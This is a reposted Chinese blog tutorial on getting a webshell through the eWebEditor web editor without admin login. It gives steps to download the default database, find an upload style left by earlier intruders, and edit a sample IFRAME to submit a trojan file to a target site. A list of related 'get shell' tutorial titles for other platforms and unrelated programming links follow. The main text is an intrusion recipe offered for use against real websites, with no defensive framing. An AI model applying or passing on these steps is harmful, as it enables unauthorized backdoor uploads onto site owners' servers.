ewebeditor不登陆后台也有机会拿shell
来源:互联网 发布:条件筛选数据计数 编辑:程序博客网 时间:2024/04/30 10:59
在数据库没被删掉的情况下。(默认:/db/ewebeditor.mdb)如果没删掉的话,把数据库给Down下来。
然后打开,查看Style这里,看看“前人”有没有留下痕迹 看看表格内有没有上传过asp asa等这些类型的文件,如果有往下看。
查找到这段:
<IFRAME ID=”eWebEditor1″ SRC=”../eWebEditor/ewebeditor.asp?id=content&style=s_light” FRAMEBORDER=”0″ SCROLLING=”no” WIDTH=”630″ HEIGHT=”420″> </IFRAME>
把那个s_light换成你刚才看到的样式名字,然后把链接补全。
<IFRAME ID=”eWebEditor1″ SRC=www.xxx.com/eWebEditor/ewebeditor.asp?id=content&style=adminone1 FRAMEBORDER=”0″ SCROLLING=”no” WIDTH=”630″ HEIGHT=”420″> </IFRAME>
然后另存为在本地,在本地打开,提交。
如果不出意外,就应该能看到你提交的马了。
- ewebeditor不登陆后台也有机会拿shell
- ewebeditor不进后台照样拿SHELL
- ewebeditor后台拿shell
- 不登陆后台也可以拿到shell,ewebeditor漏洞要小心
- Tomcat后台拿shell
- Tomcat后台拿shell
- WordPress后台拿shell
- xycms后台拿shell
- ph!web后台拿shell
- aspx+mssql后台登陆注入拿webshell
- Discuz后台拿shell X2.5后台shell
- Discuz! 6 后台拿Shell的方法
- 帝国6.5后台拿shell快速版
- WORDPRESS后台拿SHELL的方法
- vBulletin 4.X后台拿shell
- vBulletin 论坛全版本 后台拿shell
- 网站后台拿shell方法总结
- php168新版后台模板拿shell 技巧
- Linux USB 鼠标驱动程序解析
- 客户区和非客户区指的什么?窗口客户区和视图客户区的区别!
- mtd 设备 关键数据 创建过程
- DataGridView绑定复杂对象
- 现代五子棋
- ewebeditor不登陆后台也有机会拿shell
- WinCE USB驱动CDevice::EnterOperationalState函数相关
- 初识AutoHotKey
- 强大的计算机工作面试笔试题目...
- 使用Application变量
- fodero9 nfs mini6410
- 一步步学汇编(六)内存寻址方式
- 一步步学汇编(六)内存寻址方式
- 开始学习C#和visual studio 2008